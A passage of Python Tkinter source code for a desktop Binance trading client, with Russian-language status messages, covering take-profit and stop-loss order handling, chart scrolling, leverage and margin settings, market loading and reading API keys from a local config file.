if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Positiion LONG Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Take-Profit Set [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Positiion SHORT Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Stop-Loss Set [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTPR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def Scale_TP_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
app.Scale_TP.set(app.Scale_TP.get()-0.1)
if event.num == 4 or event.delta >= 120:
app.Scale_TP.set(app.Scale_TP.get()+0.1)
def Scale_SL_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
app.Scale_SL.set(app.Scale_SL.get()-0.1)
if event.num == 4 or event.delta >= 120:
app.Scale_SL.set(app.Scale_SL.get()+0.1)
def OptionCYP_selected(self,choice):
global grZm
global should_run_C
grZm_choice = choice
if grZm_choice == '-50%':
grZm = 50
elif grZm_choice == '-40%':
grZm = 100
elif grZm_choice == '-30%':
grZm = 200
elif grZm_choice == '-20%':
grZm = 300
elif grZm_choice == '-10%':
grZm = 400
elif grZm_choice == '0%':
grZm = 500
elif grZm_choice == '+10%':
grZm = 600
elif grZm_choice == '+20%':
grZm = 700
elif grZm_choice == '+30%':
grZm = 800
elif grZm_choice == '+40%':
grZm = 900
elif grZm_choice == '+50%':
grZm = 1000
if GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
#Stop Timer
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
time.sleep(0.5)
#Restart Timer
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
def button1_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button1_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_1.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_1.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_VV.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_BTCD.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def button10_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button10_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Cn.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Cn.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonSm_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def buttonSm_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Sm.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Sm.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonZm_release(self,event):
global SxF, SyF
global yI0Zm
global grH
SxF, SyF = event.x, event.y
grMd=grH/2
yy = yI0Zm +(((grMd - SyF)/25)*prSt)
#print (yy)
if prSt >= 1:
yy1 = "%.0f" % (yy)
yy2=float(yy1)
if prSt == 0.1:
yy1 = "%.1f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.01:
yy1 = "%.2f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.001:
yy1 = "%.3f" % (yy)
yy2=float(yy1)
elif prSt == 0.0001:
yy1 = "%.4f" % (yy)
yy2=float(yy1)
elif prSt == 0.00001:
yy1 = "%.5f" % (yy)
yy2=float(yy1)
elif prSt == 0.000001:
yy1 = "%.6f" % (yy)
yy2=float(yy1)
elif prSt == 0.0000001:
yy1 = "%.7f" % (yy)
yy2=float(yy1)
elif prSt == 0.00000001:
yy1 = "%.8f" % (yy)
yy2=float(yy1)
app.text_POrd.delete(1.0,END)
app.text_POrd.insert(1.0, yy2)
def CB_P_changed(self,event):
global SP
global grSmb
global prSt
global grSt
global grOW
global Lo
global Lvrg
global Lvrg_Tmp
global MrgT
global MrgT_Tmp
global Should_Chng
global orLSS
SP = self.CB_P.get()
self.label_P.config(text = SP)
tstr=''
orLSS=1
Should_Chng = False
if MS == 'SPOT':
tstr = 'SPOT'
MrgT='NONE'
MrgT_Tmp='NONE'
if len(myTuplEI1)>0 and len(mylistSP)>0:
for mm in range (len(mylistSP)):
if mylistSP[mm]['symbol'] == SP:
app.Tree_PI.item(1, values=('symbol',mylistSP[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistSP[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistSP[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistSP[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset','-'))
app.Tree_PI.item(6, values=('contractType','-'))
mylist10 = []
mylist10 = mylistSP[mm]['filters']
if len(mylist10)>0:
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[2]['stepSize']))
prSt = float(mylist10[0]['tickSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[5]['maxQty'])
Lo=0
grSmb = SP
elif MS == 'FUTURES':
tstr = 'FUTURES'
if len(myTuplEI2)>0 and len(mylistFT)>0:
for mm in range (len(mylistFT)):
if mylistFT[mm]['symbol'] == SP:
#print(mylistFT[mm])
app.Tree_PI.item(1, values=('symbol',mylistFT[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistFT[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistFT[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistFT[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset',mylistFT[mm]['marginAsset']))
app.Tree_PI.item(6, values=('contractType',mylistFT[mm]['contractType']))
mylist10 = []
mylist10 = mylistFT[mm]['filters']
if len(mylist10)>0:
prSt = float(mylist10[0]['tickSize'])
orLSS= float(mylist10[1]['stepSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[2]['maxQty'])
Lo=0
grSmb = SP
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[1]['stepSize']))
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
if BnFAcc10['symbol']==grSmb:
#print (grSmb)
Lvrg=BnFAcc10['leverage']
Lvrg_Tmp = Lvrg
#print(Lvrg)
app.CB_Lvrg.set(Lvrg)
app.label_OrdAss.config(text = 'USDT x ' + str(Lvrg))
Isl=BnFAcc10['isolated']
if Isl == True:
app.CB_MrgT.set('ISOLATED')
MrgT='ISOLATED'
MrgT_Tmp=MrgT
elif Isl==False:
app.CB_MrgT.set('CROSSED')
MrgT='CROSSED'
MrgT_Tmp=MrgT
#print(bot.symbolLeverage(symbol=grSmb))
#print(bot.symbolMarginType(symbol=grSmb))
self.label_PI.config(text = tstr)
def CB_MrgT_changed(self,event):
global MrgT_Tmp
if MS == 'FUTURES':
MrgT_Tmp = app.CB_MrgT.get()
def CB_Lvrg_changed(self,event):
global Lvrg_Tmp
Lvrg_Tmp = app.CB_Lvrg.get()
def click_button_MrLvSet(self):
#global Lvrg
#global MrgT
global Should_Chng
Should_Chng=False
MrgT_Tmp_B=False
Msg_Tmp=0
if MrgT_Tmp == 'ISOLATED':
MrgT_Tmp_B=True
else:
MrgT_Tmp_B=False
if MS == 'FUTURES':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb:
Should_Chng=False
Msg_Tmp=3
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
#if BnFAcc10['symbol']==grSmb:
# print(BnFAcc10['positionAmt'])
# print (float(BnFAcc10['leverage']),float(Lvrg_Tmp),BnFAcc10['isolated'],MrgT_Tmp_B,MrgT_Tmp)
if BnFAcc10['symbol']==grSmb and (float(BnFAcc10['positionAmt'])>0 or float(BnFAcc10['positionAmt'])<0):
Msg_Tmp=1
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and float(BnFAcc10['leverage']) == float(Lvrg_Tmp) and BnFAcc10['isolated'] == MrgT_Tmp_B and Msg_Tmp==0:
Msg_Tmp=2
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and (float(BnFAcc10['leverage']) != float(Lvrg_Tmp) or BnFAcc10['isolated'] != MrgT_Tmp_B) and Msg_Tmp==0:
Should_Chng=True
if BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) == float(Lvrg_Tmp):
Msg_Tmp=4
elif BnFAcc10['isolated'] == MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=5
elif BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=6
if Should_Chng==False and Msg_Tmp==1:
messagebox.showinfo("Set changes decline", "Есть открытые позиции по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==2:
messagebox.showinfo("Set changes decline", "Нет изменений по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==3:
messagebox.showinfo("Set changes decline", "Есть открытые ордера по данной паре " + grSmb)
#print (Should_Chng)
#print (Lvrg,Lvrg_Tmp,MrgT,MrgT_Tmp)
if Should_Chng==True:
if Msg_Tmp==5 or Msg_Tmp==6:
bot.futuresChLeverage(symbol=grSmb,leverage=int(Lvrg_Tmp))
messagebox.showinfo("Set changes leverage", "Плечо по данной паре " + grSmb + "установлено" + Lvrg_Tmp)
sys_msg = ' Кредитное плечо пары ' + grSmb + ' установлено x' + Lvrg_Tmp
app.Sys_Msg(text1=sys_msg)
if Msg_Tmp==4 or Msg_Tmp==6:
bot.futuresChMarginType(symbol=grSmb,marginType=MrgT_Tmp)
messagebox.showinfo("Set changes margin", "Маржа по данной паре " + grSmb + "установлена" + MrgT_Tmp)
sys_msg = ' Режим маржи пары ' + grSmb + ' установлен:' + MrgT_Tmp
app.Sys_Msg(text1=sys_msg)
def market_selected(self,choice):
global MS
MS = choice
if MS == 'SPOT':
app.CB_MrgT['values'] = ('NONE')
app.CB_MrgT.current(0)
MrgT='NONE'
app.CB_Lvrg['values'] = ('1')
app.CB_Lvrg.current(0)
elif MS == 'FUTURES':
app.CB_MrgT['values'] = ('ISOLATED', 'CROSSED')
app.CB_MrgT.current(0)
MrgT='ISOLATED'
app.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
app.CB_Lvrg.current(0)
self.PL_make()
def graph_selected(self,choice):
global GS
GS = choice
wh = root.winfo_height()
ww = root.winfo_width()
if GS=='TICK':
app.graph_1.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_Sm.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_1.place_forget()
app.graph_Sm.place_forget()
app.graph_Cn.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_VV.place(x=10,y=wh-300,width=ww-490,height=100)
app.graph_BTCD.place(x=10,y=180,width=ww-490,height=100)
elif GS=='CANDLE SUMM':
app.graph_1.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
app.graph_Sm.place(x=10,y=150,width=ww-490,height=wh-320)
def pair_selected(self,choice):
global MPS
MPS = choice
if choice == 'Все':
MPS = ''
elif choice == 'USDT':
MPS = 'USDT'
self.PL_make()
def PL_make(self):
if MS == 'SPOT':
if MPS == '':
app.CB_P["values"] = mylist1
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistSP)):
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
app.CB_P["values"] = mylist10
elif MS == 'FUTURES':
if MPS == '':
app.CB_P["values"] = mylist2
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistFT)):
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistFT[mm]['symbol'])
app.CB_P["values"] = mylist10
app.List_Ord.insert(END, 'sjdhsjhd')
def Scale_TP_change(self,value):
global GPPP_Tmp
global PPP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
def Scale_SL_change(self,value):
global GPSP_Tmp
global PSP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
#print ('SL_change',value)
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
#______________MAIN WINDOW GUI END
#______________MAIN WINDOW GUI LOADING BEGIN
#__Start CODE
root = Tk()
app = gui(root)
root.title('Binance trading')
root.protocol("WM_DELETE_WINDOW", close_window)
root.geometry("1400x850+150+100")
#__Main Menu
menu = Menu(root)
new_item=Menu(menu, tearoff=0)
new_item.add_command(label='Account',command=clicked_Bnacc)
new_item.add_separator()
new_item.add_command(label='Balances',command=clicked_blns)
new_item.add_command(label='Orders',command=clicked_Ordrs)
menu.add_cascade(label='Account', menu=new_item)
root.config(menu=menu)
#__Connecting Binance
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str = time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = str(time_local_str) + ' Start Programm. Connecting Binance ...'
app.text_Sys.insert(1.0, sys_msg)
#print(bot.time())
myListST = bot.time()
sss23 = myListST['serverTime']/1000
sss24 = datetime.datetime.fromtimestamp(sss23)
sss25=sss24.strftime("[%d.%m.%Y %H:%M:%S] ")
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance time: ' + str(sss25)
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Считываю рынки Binance ...'
app.text_Sys.insert(END, sys_msg)
#__start reading Markets.SPOT
myTuplEI1 = bot.exchangeInfo()
app.CB_P["values"]=()
mylist1 = []
mylist10 = []
if len(myTuplEI1)>0:
mylistSP = myTuplEI1['symbols']
if len(mylistSP)>0:
for mm in range (len(mylistSP)):
mylist1.append(mylistSP[mm]['symbol'])
#print(mylist1[mm]['symbol'])
if MPS == 'USDT':
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
if mylistSP[mm]['symbol'] == grSmb and MS == 'SPOT':
myListSmbFlt = []
myListSmbFlt = mylistSP[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[5]['maxQty'])
#print (prSt, grOW)
#__start reading Markets.FUTURES
myTuplEI2 = bot.futuresExchangeInfo()
mylist2 = []
mylist20 = []
if len(myTuplEI2)>0:
mylistFT = myTuplEI2['symbols']
if len(mylistFT)>0:
for mm in range (len(mylistFT)):
mylist2.append(mylistFT[mm]['symbol'])
if MPS == 'USDT':
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist20.append(mylistFT[mm]['symbol'])
if mylistFT[mm]['symbol'] == grSmb and MS == 'FUTURES':
myListSmbFlt = []
myListSmbFlt = mylistFT[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[2]['maxQty'])
#print (prSt, grOW)
if MS =='SPOT':
if MPS == 'USDT':
app.CB_P["values"] = mylist10
else:
app.CB_P["values"] = mylist1
elif MS == 'FUTURES':
if MPS == 'USDT':
app.CB_P["values"] = mylist20
else:
app.CB_P["values"] = mylist2
app.CB_P.set=grSmb
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Рынки Binance считаны.'
app.text_Sys.insert(END, sys_msg)
#__"BNBUSDT - trades"
myTuplTr = ('trades', bot.trades(symbol=grSmb, limit=1)) #Tupl
myDicGr1 = myTuplTr[1][0] #dict
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Programmm ready to work!'
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Текущий график: ' + GS
sys_msg += '\n' + str(time_local_str) + ' Текущий рынок: ' + MS + '. Текущие пары: ' + MPS
sys_msg += '\n' + str(time_local_str) + ' Текущая пара: ' + grSmb
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if os.path.isfile('iTrader.cfg') == False:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек отсуствует. Необходимо ввести API_KEYS в меню Account для работы с программой'
else:
if os.stat("iTrader.cfg").st_size == 0:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек пуст. Необходимо ввести API_KEYS в меню Account для работы с программой'
else:
my_file_Account = open("iTrader.cfg", "r")
l = 0
while True:
sss00 = my_file_Account.readline()
if not sss00:
break
if l == 0:
API_KEY_s = sss00.replace ("\n", "")
elif l == 1:
API_SECRET_s = sss00.replace ("\n", "")
l +=1
my_file_Account.close()
if API_KEY_s == '' or API_SECRET_s =='':
l = 0
if l >= 2:
isAcc = True
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек считан успешно.'
elif l < 2:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек считан с ошибками. Необходимо ввести API_KEYS в меню Account для работы с программой'
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if isAcc == True:
#print(API_SECRET_s)
#print(API_KEY_s)
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
#__start reading acc
myListAcc = bot.account()
#print(bot.account())
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = "\n" + str(time_local_str) + " Binance SPOT account. Permissions: " + str(myListAcc['permissions']) + '. CanDeposit: ' + str(myListAcc['canDeposit'])
sys_msg += str(". canWithdraw: ") + str(myListAcc['canWithdraw'])
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
BnFAcc = bot.ftrsGetPositionSide()
#print (BnFAcc)
if BnFAcc['dualSidePosition']==True:
app.label_HM.config(text="Position Mode: Both")
else:
app.label_HM.config(text="Position Mode: One-way")
#______________MAIN WINDOW GUI LOADING END
#______________MAIN WINDOW GUI EVENTS BEGIN
def config(event):
global grH
global grW
if event.widget == root and ep==False:
app.label_BU.place(x=event.width-210, y=10, width=200, height=40)
app.button_2.place(x=event.width-260, y=10, width=50, height=40)
app.button_AB.place(x=event.width-260, y=60, width=50, height=50)
app.label_PnL.place(x=event.width-210, y=60, width=200, height=50)
app.label_HM.place(x=event.width-210, y=120, width=200, height=40)
app.label_7.place(x=10, y=10, width=event.width-20, height=event.height-20)
app.List_Ord.place(x=210, y=10, width=event.width-490, height=100)
app.List_Ord_Scrl.place(height=100,width=10,x=event.width-280,y=10)
app.Tree_Ord.place(x=210, y=10, width=event.width-490, height=100)
app.Tree_Ord_VScrl.place(height=100,width=10,x=event.width-280,y=10)
app.label_Grpf.place(width=event.width-440, height=event.height-320,x=10,y=150)
app.label_Ord.place(height=event.height-320,width=200,x=event.width-420,y=150)
app.label_Cmd.place(height=event.height-320,width=200,x=event.width-210,y=150)
app.label_PI.place(height=event.height-320-390,width=200,x=0,y=120)
app.Tree_PI.place(height=event.height-320-390,width=185,x=0,y=120)
app.Tree_PI_VScrl.place(height=event.height-320-390,width=10,x=185,y=120)
